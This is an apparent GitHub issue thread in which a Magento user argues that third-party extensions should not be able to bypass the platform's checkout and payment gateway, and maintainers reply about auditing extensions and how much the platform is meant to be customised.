Open elieobeid7 opened 5 years ago
elieobeid7
commented
5 years ago I'm trying to use a booking module, it comes with its own payment configuration, so in other words, for the price of using a booking module, the developer forced me to use his payment system, and if I want to add mpgs I have to pay him.
That's what's pissing me off, and that's why I want the payment gateway to be standardized, so that a booking system module won't be able to bypass Magento's checkout.
cjnewbs
commented
5 years ago I'm so pissed that I have to pay him. I'm furious. It seems to me that magento extension developers are able to blackmail users for every little functionality.
This is not blackmail. Unless I'm very much mistaken the extension you chose to use does not contain the functionality you require. Perhaps a simpler solution would be to find a payment module that actually fulfils your requirements before purchasing it.
But more importantly. this is a security issue, it means that every extension you install might be stealing your payment info, every single one of them.
Yes, this is always a risk. You should always audit any 3rd party code you use.
Don't allow any extension to manipulate the checkout page or the payment gateway. Other than a select few, that you approve. That way at least one knows that no matter what an extension does, it cannot steal the payment information or alter the payment process.
Magento is an incredibly flexible framework/application and it's success comes from allowing developers to extend and modify behaviour as required. Countless merchants require customisations to the checkout due to business requirements. Most payment modules I have come across communicate directly with the bank/payment processor they provide functionality for. If your chosen module connects to a server run by the module developer, which when connects to the bank I see that as a HUGE red flag. I don't know the exact details of your situation but that seems like an additional step that is not required.
elieobeid7
commented
5 years ago If you should audit every extension, that'd be a huge waste of time, besides vendors don't give you the code before the purchase. If you want to purchase and then audit, first of all, your money is gone, secondly, I have 43 plugins, it's faster to write my own store from scratch.
Each plugin costs at least $100, the average is $400, it'd be better to force these vendors to submit the code to magento and magento take some money like apple, it's a win-win.
To make it even easier, don't allow sensitive permissions by default, if one wants to have those, he either modifies his own installation or buys a certified plugin that can do that.
Right now I'm using webkul, the most famous extension vendor of all, he worked for airlines and Deloitte, they gave him a reward. If webkul can do such things to make more money, I'm not sure I can trust any extension developer, anyone.
The very very least you can do, is force a user review repository, look
https://wordpress.org/plugins/
9/10 wordpress plugins can be found here, if there's a problem one could easily see it in the reviews.
In contrast, 9/10 magento plugin is paid and sold by the vendor, therefore it has no reviews one can see, other than the stupid 5 stars that the vendor display on his own website.
If woocomerce got hacked, wordpress wouldn't care, they're in the blogging system, magento's whole business depends on selling stuff, the least they can do is ensure some security or review system for the plugins.
MellenIO
commented
5 years ago If you should audit every extension, that'd be a huge waste of time
If you believe that auditing a third party extension from a (potentially) reputable provider will take more time than writing your own tested, compatible module then that is what you should be doing.
besides vendors don't give you the code before the purchase.
No they don't; it is their property.
Each plugin costs at least $100, the average is $400, it'd be better to force these vendors to submit the code to magento and magento take some money like apple, it's a win-win.
Most vendors also sell via the Magento Marketplace (marketplace.magento.com) see here & here for examples
My client bought third party extensions from a company, the extensions integrate with PayPal and Stripe, when we told them that we're going to use MPGS they wanted to charge more in order to customize their extensions to use that.
It sounds like you're asking for functionality that isn't presently available in the extension, so they're charging you extra for the bespoke functionality.
You see, I could easily integrate MPGS into magento,
Then why don't you do it? That seems to stop this issue as it stands.
There will always be "rogue" modules & vendors as you're describing. This isn't limited to Magento; recently (maybe 3-4 months?), there was a theme for WordPress which I believe was outed as having numerous backdoors & "self-destruct switches" inside (I can't remember the link so if anyone has it feel free to correct me). As you said, trust no one. That includes auditing premium extensions.
elieobeid7
commented
5 years ago You see, I could easily integrate MPGS into magento,
Because the extension developer does not respect the official magento payment gateway endpoint, which is my request in this question all along, pick an endpoint, for example example.com/checkout which all users must go to when they want to buy something and it should belong to magento.
I said, by bypassing the default endpoint, an extension is able to force to pay for something that is free and is creating a security vulnerability.
What's the point of auditing something if you can only audit it after purchase? How you're going to get your money back? Auditing should take place before users get scammed.
Also, imagine google telling people to inspect the source code of every app they download, or wordpress telling users to inspect all code of all extensions and blaming them if things go wrong, that's nonsense, no one would use them, you're asking people to become magento developers before using Magento, that's what you're saying "Sorry if you're not a magento certified developer, then this platform isn't for you."
My client wants to use Mastercard's payment gateway (MPGS) provided by his bank. Magento has a free extension for that. In my country, Stripe and PayPal don't work.
My client bought third party extensions from a company, the extensions integrate with PayPal and Stripe, when we told them that we're going to use MPGS they wanted to charge more in order to customize their extensions to use that.
You see, I could easily integrate MPGS into magento, but yet, an extension developer is able to force me to pay him because he can redirect users to a payment gateway associated with his extensions. I'm so pissed that I have to pay him. I'm furious. It seems to me that magento extension developers are able to blackmail users for every little functionality.
But more importantly. this is a security issue, it means that every extension you install might be stealing your payment info, every single one of them.
My request is:
Don't allow any extension to manipulate the checkout page or the payment gateway. Other than a select few, that you approve. That way at least one knows that no matter what an extension does, it cannot steal the payment information or alter the payment process.
like force all payments to go through example.com/checkout
where checkout is the official checkout endpoint created by magento
First security rule, don't trust anyone. Here I'm forced to trust everyone. For the payment part at least, at least for that, I would like to trust the magento. we bought 42 extensions from the vendor and in like 5 we have to configure payment gateways.
I mean who knows, maybe in 5 years from now the extension vendor goes bankrupt and starts needing more money, therefore he starts stealing some percentage of every purchase.